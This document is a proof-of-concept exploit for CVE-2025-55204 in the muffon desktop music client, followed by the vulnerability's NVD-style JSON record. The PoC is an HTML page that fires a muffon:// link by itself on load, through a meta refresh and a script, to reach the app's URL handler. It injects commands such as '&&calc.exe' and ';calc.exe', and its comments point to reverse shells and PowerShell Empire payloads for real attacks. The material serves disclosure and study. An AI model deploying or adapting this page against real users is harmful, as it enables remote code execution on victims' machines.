CVE-2025-55204

// CVE-2025-55204 PoC - Malicious webpage to trigger RCE in muffon < 2.3.0 // This PoC demonstrates how an attacker can embed a malicious muffon:// link // to achieve Remote Code Execution on victim's machine <!DOCTYPE html> <html> <head> <title>CVE-2025-55204 PoC</title> </head> <body> <h1>Muffon RCE Vulnerability PoC</h1> <p>Click the link below or visit this page to trigger the vulnerability:</p> <!-- Method 1: Auto-trigger via meta refresh --> <meta http-equiv="refresh" content="0;url=muffon://[malicious_command]"> <!-- Method 2: Clickable link --> <a href="muffon://[malicious_command]">Click here</a> <!-- Example: Execute calc.exe on Windows --> <a href="muffon://calc.exe">Open Calculator (Example)</a> <script> // Auto-trigger when page loads // This uses the custom protocol handler to execute commands window.location.href = 'muffon://[OS_COMMAND]'; // Modern browsers may require user interaction, so we can use: document.addEventListener('click', function() { window.location.href = 'muffon://[OS_COMMAND]'; }); </script> </body> </html> // Real-world exploitation would use encoded commands: // muffon://&&calc.exe (Windows) // muffon://;calc.exe (Unix-like) // The actual vulnerable URL format depends on muffon's protocol handler implementation // Attackers would typically use: // - Reverse shell commands // - PowerShell Empire payloads // - Custom malicious executables

{"cve": {"id": "CVE-2025-55204", "sourceIdentifier": "[email protected]", "published": "2026-01-05T18:15:42.987", "lastModified": "2026-01-12T18:11:26.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "muffon is a cross-platform music streaming client for desktop. Versions prior to 2.3.0 have a one-click Remote Code Execution (RCE) vulnerability in. An attacker can exploit this issue by embedding a specially crafted `muffon://` link on any website they control. When a victim visits the site or clicks the link, the browser triggers Muffon’s custom URL handler, causing the application to launch and process the URL. This leads to RCE on the victim's machine without further interaction. Version 2.3.0 patches the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:muffon:muffon:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "868FC387-5943-47FC-9F90-355D79C870E2"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1eCPCQ6leuVM_vecfofFv04c0t9isCBqR/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/staniel359/muffon/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/staniel359/muffon/security/advisories/GHSA-gc3f-gqph-522q", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}